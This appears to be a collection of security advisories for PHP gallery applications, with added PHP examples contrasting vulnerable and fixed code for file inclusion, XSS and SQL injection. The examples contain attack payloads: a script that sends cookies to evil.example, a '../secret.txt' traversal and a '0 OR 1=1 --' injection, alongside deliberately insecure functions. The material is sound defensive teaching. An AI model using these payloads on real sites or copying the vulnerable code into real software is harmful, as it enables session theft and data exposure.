zenphoto Ajax File Manager Code Injection
Application: zenphoto
Affected Version: version 1.4.1.4 and prior versions.
Vendor’s URL: Ajax File Manager
Bug Type: Code Injection
Risk Level: Critical
Solution:
Update to version 1.4.1.5 or later.
Application: Ayco Resim Galeri
Affected Version:
Vendor’s URL: Ayco Resim Galeri
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitised.
Application: PHP Album
Affected Version: version 0.4.1.14.fix06 and other versions.
Vendor’s URL: PHP Album
Bug Type: Cross Site Scripting and system access
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitised. Do not browse untrusted sites or follow untrusted links while logged in to the application.
Application: TFT Gallery
Affected Version: version 0.13.1
Vendor’s URL: TFT Gallery
Bug Type: File Inclusion
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly verified.
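The "verify input" advice for the file inclusion entries (TFT Gallery above, and the Coppermine 1.4.18 entry further down) is easier to apply with the pattern in front of you. The following is an added example and is not code from TFT Gallery, Coppermine or any other listed project: the typical gallery-style include-from-parameter beside an allowlist fix. It creates a temporary directory with two constructed template files and a constructed secret file so it runs offline; the directory layout, file names and the template map are assumptions made for illustration.

```php
<?php
// Added example, not taken from any of the listed gallery projects.
// Sets up a throwaway directory so the vulnerable and fixed versions can be run side by side.
$base = sys_get_temp_dir() . '/gallery_' . bin2hex(random_bytes(4));   // assumed layout
mkdir($base . '/templates', 0700, true);
file_put_contents($base . '/templates/list.php', "<?php echo \"list template\\n\";");
file_put_contents($base . '/templates/view.php', "<?php echo \"view template\\n\";");
file_put_contents($base . '/secret.txt', "db_password=hunter2\n");     // constructed secret

// Vulnerable: the request parameter (think $_GET['template']) selects the file.
// "../secret.txt" walks out of the template directory; PHP echoes a file with no
// <?php tag verbatim, so the credentials file is disclosed. With allow_url_include
// enabled, a "http://..." value would fetch and execute remote code instead.
function loadTemplateVulnerable(string $base, string $tpl): void
{
    include $base . '/templates/' . $tpl;
}

// Fixed: the parameter is only a key into a fixed map of known templates, and as a
// second guard the resolved path must lie inside the template directory.
function loadTemplateFixed(string $base, string $tpl): void
{
    $allowed = ['list' => 'list.php', 'view' => 'view.php'];   // assumed template map
    if (!isset($allowed[$tpl])) {
        throw new InvalidArgumentException("unknown template: $tpl");
    }
    $dir  = realpath($base . '/templates');
    $path = realpath($dir . '/' . $allowed[$tpl]);
    if ($path === false || strncmp($path, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        throw new RuntimeException('template resolves outside the template directory');
    }
    include $path;
}

loadTemplateVulnerable($base, '../secret.txt');   // prints "db_password=hunter2"
loadTemplateFixed($base, 'view');                 // prints "view template"
try {
    loadTemplateFixed($base, '../secret.txt');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}

// Remove the throwaway directory again.
array_map('unlink', glob($base . '/templates/*'));
rmdir($base . '/templates');
unlink($base . '/secret.txt');
rmdir($base);
```

The map is the real fix; the realpath check is belt-and-braces for the day someone adds a map entry containing a path. Rejecting unknown keys outright is preferable to stripping "../" from the value, since stripping can be bypassed with encodings or nested sequences.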
Application: GaleriaSHQIP
Affected Version: version 1.0 and other versions.
Vendor’s URL: GaleriaSHQIP
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitised.
Application: Coppermine Photo Gallery
Affected Version: version 1.4.22 and other versions.
Vendor’s URL: Coppermine Photo Gallery
Bug Type: SQL Injection and System access
Risk Level: Critical
Solution:
Set “magic_quotes_gpc” to “On” and “register_globals” to “Off”. Treat this as a stop-gap only: magic_quotes_gpc escapes quote characters and does nothing for values used in unquoted (numeric) SQL contexts, and both directives were deprecated in PHP 5.3 and removed in PHP 5.4, so the affected queries themselves still need to be fixed.
Application: Coppermine
Affected Version: version 1.4.20 and 1.4.21 and other versions.
Vendor’s URL: Coppermine Photo Gallery
Bug Type: Cross Site Scripting
Risk Level: Medium
Solution:
Update to version 1.4.21, which protects from exploitation via bbcode tags. Do not visit untrusted web sites while logged in to the application.
Application: Coppermine
Affected Version: version 1.4.19 and other versions.
Vendor’s URL: Coppermine Photo Gallery
Bug Type: Security Bypass
Risk Level: Critical
Solution:
Update to version 1.4.20.
Application: Gallery
Affected Version: Gallery 1.x versions 1.5.8-svn-b34 and later
Vendor’s URL: Gallery
Bug Type: Security Bypass
Risk Level: Critical
Solution:
Update to version 1.5.10.
Application: Coppermine
Affected Version: version 1.4.18 and other versions.
Vendor’s URL: Coppermine Photo Gallery
Bug Type: File Inclusion
Risk Level: Critical
Solution:
Update to version 1.4.19.
Application: Gallery
Affected Version: prior to 1.5.8
Vendor’s URL: Gallery
Bug Type: Security Bypass, Cross Site Scripting
Risk Level:
Solution:
Update to version 1.5.8.
Application: Zoph
Affected Version: prior to 0.7.0.5.
Vendor’s URL: Zoph
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Update to version 0.7.0.5.
Application: Gallery
Affected Version: all 2.x versions before 2.2.5
Vendor’s URL: http://gallery.menalto.com/
Bug Type: Cross Site Scripting and Security Bypass
Risk Level: Medium
Solution:
Update to version 2.2.5. Remove password protection from any non-album items.
Application: PHP Image Gallery
Affected Version:
Vendor’s URL: PHP Image Gallery
Bug Type: Cross Site Scripting
Risk Level: Medium
Solution:
Edit the source code to ensure that input is properly sanitized.
Application: Galleristic
Affected Version: version 1.0 and other versions.
Vendor’s URL: Galleristic
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitized.
Application: Simple Gallery
Affected Version: 2.2 and other versions.
Vendor’s URL: Simple Gallery
Bug Type: Cross Site Scripting
Risk Level: Medium
Solution:
Edit the source code to ensure that input is properly sanitized.
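The cross-site scripting entries above (PHP Album, PHP Image Gallery, Simple Gallery) all end with "ensure that input is properly sanitized". For XSS the effective control is output encoding for the context the value lands in, not input filtering. The block below is an added example and is not code from any of the listed projects: a reflected parameter echoed into an HTML page the vulnerable way, beside the same page rendered with context-appropriate encoding. The parameter name, the page markup and the attacker payload are constructed for illustration.

```php
<?php
// Added example, not taken from any of the listed gallery projects.
// Constructed attacker-controlled value, as it might arrive in $_GET['album'].
$album = '"><script>document.location="http://evil.example/?c="+document.cookie</script>';

// Vulnerable: the parameter is echoed straight into HTML, once in text context and
// once inside a double-quoted attribute. The leading "> closes the attribute and
// the tag, and the <script> element reaches the browser intact.
function renderVulnerable(string $album): string
{
    return "<h1>Album: $album</h1>\n<a href=\"?album=$album\">next</a>\n";
}

// Fixed: encode at output time for the HTML context. ENT_QUOTES also escapes single
// quotes (so the helper is safe inside single-quoted attributes), ENT_SUBSTITUTE
// replaces invalid byte sequences instead of returning an empty string, and the
// explicit charset stops encoder and browser disagreeing about byte boundaries.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The href is a URL context first and an HTML attribute second, so the value is
// percent-encoded for the query string and then HTML-encoded for the attribute.
function renderFixed(string $album): string
{
    return '<h1>Album: ' . h($album) . "</h1>\n"
         . '<a href="?album=' . h(rawurlencode($album)) . '">next</a>' . "\n";
}

echo renderVulnerable($album);   // contains a live <script> tag
echo renderFixed($album);        // the browser sees &lt;script&gt;... as text
```

Encoding on output rather than on input is what makes the fix hold: the same stored album title may later be emitted into HTML, a JavaScript string or a URL, and each of those needs a different encoder.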
Application: PHP Photo Gallery
Affected Version:
Vendor’s URL: PHP Photo Gallery
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitized.
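Several entries above (Ayco Resim Galeri, GaleriaSHQIP, Galleristic, PHP Photo Gallery) give "edit the source code to ensure that input is properly sanitised" as the fix for SQL injection, and the Coppermine 1.4.22 entry recommends magic_quotes_gpc instead. The following is an added example and is not code from any of the listed projects: the gallery-style query that pastes a request parameter into SQL, with the escaping that magic_quotes_gpc would apply, beside the prepared-statement fix. It shows why quote escaping is not enough: the injection point is an unquoted integer, so there is nothing for addslashes to escape. An in-memory SQLite database is used so it runs offline; the table, column names and sample rows are assumptions made for illustration.

```php
<?php
// Added example, not taken from any of the listed gallery projects.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Assumed schema: one public and one hidden picture (constructed sample data).
$db->exec('CREATE TABLE pictures (pid INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)');
$db->exec("INSERT INTO pictures VALUES (1, 'public photo', 0), (2, 'private photo', 1)");

// Vulnerable: $_GET['pid'] concatenated into the query. addslashes() here emulates
// magic_quotes_gpc=On; it escapes quotes, backslashes and NUL, none of which the
// payload needs, because the value sits in an unquoted numeric context.
function getPictureVulnerable(PDO $db, string $pid): array
{
    $escaped = addslashes($pid);
    $sql = "SELECT pid, title FROM pictures WHERE pid = $escaped AND hidden = 0";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: validate the value against the type the column expects, then bind it as a
// parameter so it can never be parsed as SQL. Either step alone would stop this
// payload; together they also give a clear error for malformed input.
function getPictureFixed(PDO $db, string $pid): array
{
    if (!preg_match('/^\d+$/', $pid)) {
        throw new InvalidArgumentException('pid must be a non-negative integer');
    }
    $stmt = $db->prepare('SELECT pid, title FROM pictures WHERE pid = :pid AND hidden = 0');
    $stmt->bindValue(':pid', (int) $pid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: no quotes, so escaping leaves it untouched, and the
// trailing comment removes the "hidden = 0" restriction.
$payload = '0 OR 1=1 --';
print_r(getPictureVulnerable($db, $payload));   // both rows, including the hidden one
try {
    getPictureFixed($db, $payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
print_r(getPictureFixed($db, '1'));             // only the public row
```

The same prepared-statement form covers string parameters too (bind with PDO::PARAM_STR), which is the case magic_quotes_gpc was meant to paper over; with parameters bound, the quoting mode of the PHP runtime no longer matters.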
Application: Gallery Script Lite
Affected Version:
Vendor’s URL: Gallery Script Lite
Bug Type: Information Disclosure
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitized.
Application: KwsPHP ConcoursPhoto Module
Affected Version: version 2.0 and prior versions.
Vendor’s URL: KwsPHP ConcoursPhoto Module
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Update to version 2.1.
Application: Coppermine Photo Gallery
Affected Version: 1.4.16 and other versions.
Vendor’s URL: Coppermine Photo Gallery
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Update to version 1.4.17.